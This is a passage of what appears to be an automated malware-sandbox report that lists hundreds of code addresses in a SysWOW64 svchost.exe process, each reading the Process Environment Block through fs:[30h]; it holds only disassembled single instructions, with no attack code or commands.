            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov eax, dword ptr fs:[00000030h]1_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov ecx, dword ptr fs:[00000030h]1_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A250 mov eax, dword ptr fs:[00000030h]1_2_03C2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36259 mov eax, dword ptr fs:[00000030h]1_2_03C36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2826B mov eax, dword ptr fs:[00000030h]1_2_03C2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2823B mov eax, dword ptr fs:[00000030h]1_2_03C2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D061E5 mov eax, dword ptr fs:[00000030h]1_2_03D061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C601F8 mov eax, dword ptr fs:[00000030h]1_2_03C601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C70185 mov eax, dword ptr fs:[00000030h]1_2_03C70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov ecx, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C156 mov eax, dword ptr fs:[00000030h]1_2_03C2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC8158 mov eax, dword ptr fs:[00000030h]1_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov ecx, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF0115 mov eax, dword ptr fs:[00000030h]1_2_03CF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60124 mov eax, dword ptr fs:[00000030h]1_2_03C60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB20DE mov eax, dword ptr fs:[00000030h]1_2_03CB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03C2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C380E9 mov eax, dword ptr fs:[00000030h]1_2_03C380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60E0 mov eax, dword ptr fs:[00000030h]1_2_03CB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03C2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C720F0 mov ecx, dword ptr fs:[00000030h]1_2_03C720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3208A mov eax, dword ptr fs:[00000030h]1_2_03C3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC80A8 mov eax, dword ptr fs:[00000030h]1_2_03CC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov eax, dword ptr fs:[00000030h]1_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32050 mov eax, dword ptr fs:[00000030h]1_2_03C32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6050 mov eax, dword ptr fs:[00000030h]1_2_03CB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C073 mov eax, dword ptr fs:[00000030h]1_2_03C5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4000 mov ecx, dword ptr fs:[00000030h]1_2_03CB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A020 mov eax, dword ptr fs:[00000030h]1_2_03C2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C020 mov eax, dword ptr fs:[00000030h]1_2_03C2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6030 mov eax, dword ptr fs:[00000030h]1_2_03CC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB07C3 mov eax, dword ptr fs:[00000030h]1_2_03CB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]1_2_03CBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD678E mov eax, dword ptr fs:[00000030h]1_2_03CD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C307AF mov eax, dword ptr fs:[00000030h]1_2_03C307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE47A0 mov eax, dword ptr fs:[00000030h]1_2_03CE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov esi, dword ptr fs:[00000030h]1_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30750 mov eax, dword ptr fs:[00000030h]1_2_03C30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE75D mov eax, dword ptr fs:[00000030h]1_2_03CBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4755 mov eax, dword ptr fs:[00000030h]1_2_03CB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38770 mov eax, dword ptr fs:[00000030h]1_2_03C38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C700 mov eax, dword ptr fs:[00000030h]1_2_03C6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30710 mov eax, dword ptr fs:[00000030h]1_2_03C30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60710 mov eax, dword ptr fs:[00000030h]1_2_03C60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov ecx, dword ptr fs:[00000030h]1_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC730 mov eax, dword ptr fs:[00000030h]1_2_03CAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03C6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C666B0 mov eax, dword ptr fs:[00000030h]1_2_03C666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4C640 mov eax, dword ptr fs:[00000030h]1_2_03C4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C62674 mov eax, dword ptr fs:[00000030h]1_2_03C62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE609 mov eax, dword ptr fs:[00000030h]1_2_03CAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72619 mov eax, dword ptr fs:[00000030h]1_2_03C72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E627 mov eax, dword ptr fs:[00000030h]1_2_03C4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C66620 mov eax, dword ptr fs:[00000030h]1_2_03C66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68620 mov eax, dword ptr fs:[00000030h]1_2_03C68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3262C mov eax, dword ptr fs:[00000030h]1_2_03C3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C365D0 mov eax, dword ptr fs:[00000030h]1_2_03C365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C325E0 mov eax, dword ptr fs:[00000030h]1_2_03C325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov eax, dword ptr fs:[00000030h]1_2_03C32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov ecx, dword ptr fs:[00000030h]1_2_03C32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64588 mov eax, dword ptr fs:[00000030h]1_2_03C64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E59C mov eax, dword ptr fs:[00000030h]1_2_03C6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6500 mov eax, dword ptr fs:[00000030h]1_2_03CC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
